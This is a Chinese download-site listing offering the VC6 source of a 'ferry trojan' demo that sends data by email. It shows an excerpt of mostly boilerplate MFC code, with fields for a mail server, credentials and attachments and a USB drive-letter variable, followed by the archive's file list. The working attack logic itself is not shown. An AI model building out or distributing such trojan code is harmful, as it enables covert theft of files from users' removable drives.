• 大小: 54KB
    文件类型: .rar
    金币: 2
    下载: 1 次
    发布日期: 2021-06-13
  • 语言: C/C++
  • 标签: pop3  木马  源码  vc6  

资源简介

pop3协议的摆渡木马演示程序,vc6下验证通过!

资源截图

代码片段和文件信息

// cheng_vir.cpp : Defines the class behaviors for the application.
//

#include “stdafx.h“
#include “cheng_vir.h“

#include “MainFrm.h“
#include “cheng_virDoc.h“
#include “cheng_virView.h“
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#include 
//#pragma  comment(lib“shlwapi.lib“)
using namespace std;

#define BUFFER_BLOCK_SIZE 4096
#define DEAL_RETURN_CODE(retCode) { if((retCode)!=0) return retCode;}
// #define DEAL_SOCK_ERROR(retCodesock) if((retCode)==SOCKET_ERROR || (retCode)==0)\
// { \
// /* cout<<“Sock error: “<//  closesocket(sock); \
//  return -1; \
//  }
/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp

BEGIN_MESSAGE_MAP(CCheng_virApp CWinApp)
//{{AFX_MSG_MAP(CCheng_virApp)
ON_COMMAND(ID_APP_ABOUT OnAppAbout)
// NOTE - the ClassWizard will add and remove mapping macros here.
//    DO NOT EDIT what you see in these blocks of generated code!
//}}AFX_MSG_MAP
// Standard file based document commands
ON_COMMAND(ID_FILE_NEW CWinApp::OnFileNew)
ON_COMMAND(ID_FILE_OPEN CWinApp::OnFileOpen)
// Standard print setup command
ON_COMMAND(ID_FILE_PRINT_SETUP CWinApp::OnFilePrintSetup)
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp construction

CCheng_virApp::CCheng_virApp()
{
// TODO: add construction code here
// Place all significant initialization in InitInstance
m_b_Uget = FALSE;
m_NetStatusValue =-1;

    m_ServerName=““;
    m_MyEmail=““;
m_USERName=““;
m_USERPass=““;
m_Attachement_one=““;
m_Attachement_two=““;
m_Attachement_three=““;
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CCheng_virApp object

CCheng_virApp theApp;
TCHAR G_U[2];//保存U盘的盘符


/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp initialization

int ThreadProc_sendMail(LPVOID pParam)
{
CCheng_virApp *pApp = (CCheng_virApp*)pParam;
    pApp->OnSendEmaiL();
return 0;
}

BOOL CCheng_virApp::InitInstance()
{
AfxEnableControlContainer();
// Standard initialization
// If you are not using these features and wish to reduce the size
//  of your final executable you should remove from the following
//  the specific initialization routines you do not need.
// 用应用程序名创建信号量
HANDLE hSem = CreateSemaphore(NULL 1 1 m_pszExeName);
// 信号量已存在?
// 信号量存在,则程序已有一个实例运行
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
// 关闭信号量句柄
//CloseHandle(hSem);
// 寻找先前实例的主窗口
HWND hWndPrevious = ::GetWindow(::GetDesktopWindow()GW_CHILD);
while (::IsWindow(hWndPrevious))
{
// 检查窗口是否有预设的标记?
// 有,则是我们寻找的主窗
if (::GetProp(hWndPrevious m_pszExeName))
{
// 主窗口已最小化,则恢复其大小
if (::IsIconic(hWndPrevious))
::ShowWindo

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----

     文件       5139  2008-09-08 10:49  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.clw

     文件      36316  2008-09-11 21:24  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.cpp

     文件       5697  2008-09-08 10:49  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.dsp

     文件        543  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.dsw

     文件       5299  2008-09-08 10:46  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.h

     文件      16204  2008-09-08 10:06  cheng_摆渡木马演示程序\cheng_vir\cheng_vir.rc

     文件       1802  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\cheng_virDoc.cpp

     文件       1508  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\cheng_virDoc.h

     文件      23313  2008-09-11 21:24  cheng_摆渡木马演示程序\cheng_vir\cheng_virView.cpp

     文件       2940  2008-09-07 23:37  cheng_摆渡木马演示程序\cheng_vir\cheng_virView.h

     文件       1412  2008-09-05 13:37  cheng_摆渡木马演示程序\cheng_vir\Dlg_FileStatus.cpp

     文件       1237  2008-09-05 13:26  cheng_摆渡木马演示程序\cheng_vir\Dlg_FileStatus.h

     文件       1069  2008-09-05 09:51  cheng_摆渡木马演示程序\cheng_vir\Dlg_Filter.cpp

     文件       1221  2008-09-05 09:51  cheng_摆渡木马演示程序\cheng_vir\Dlg_Filter.h

     文件       5997  2008-09-07 22:02  cheng_摆渡木马演示程序\cheng_vir\Dlg_SetEmail.cpp

     文件       1668  2008-09-07 21:42  cheng_摆渡木马演示程序\cheng_vir\Dlg_SetEmail.h

     文件       1770  2008-09-05 13:37  cheng_摆渡木马演示程序\cheng_vir\Dlg_SetNet.cpp

     文件       1224  2008-09-05 10:02  cheng_摆渡木马演示程序\cheng_vir\Dlg_SetNet.h

     文件       7364  2004-03-18 15:54  cheng_摆渡木马演示程序\cheng_vir\MailMessage.cpp

     文件       1541  2004-03-18 15:54  cheng_摆渡木马演示程序\cheng_vir\MailMessage.h

     文件       3308  2008-09-08 10:04  cheng_摆渡木马演示程序\cheng_vir\MainFrm.cpp

     文件       1749  2008-09-07 22:53  cheng_摆渡木马演示程序\cheng_vir\MainFrm.h

     文件       5319  2008-09-01 15:55  cheng_摆渡木马演示程序\cheng_vir\POP3.cpp

     文件       1799  2004-03-18 15:54  cheng_摆渡木马演示程序\cheng_vir\POP3.h

     文件       5645  2008-08-29 07:16  cheng_摆渡木马演示程序\cheng_vir\POP3_1.cpp

     文件       1179  2008-08-29 09:49  cheng_摆渡木马演示程序\cheng_vir\POP3_1.h

     文件       4383  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\ReadMe.txt

     文件       1078  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\res\cheng_vir.ico

     文件        401  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\res\cheng_vir.rc2

     文件       1078  2008-09-03 09:27  cheng_摆渡木马演示程序\cheng_vir\res\cheng_virDoc.ico

............此处省略13个文件信息

评论

共有 条评论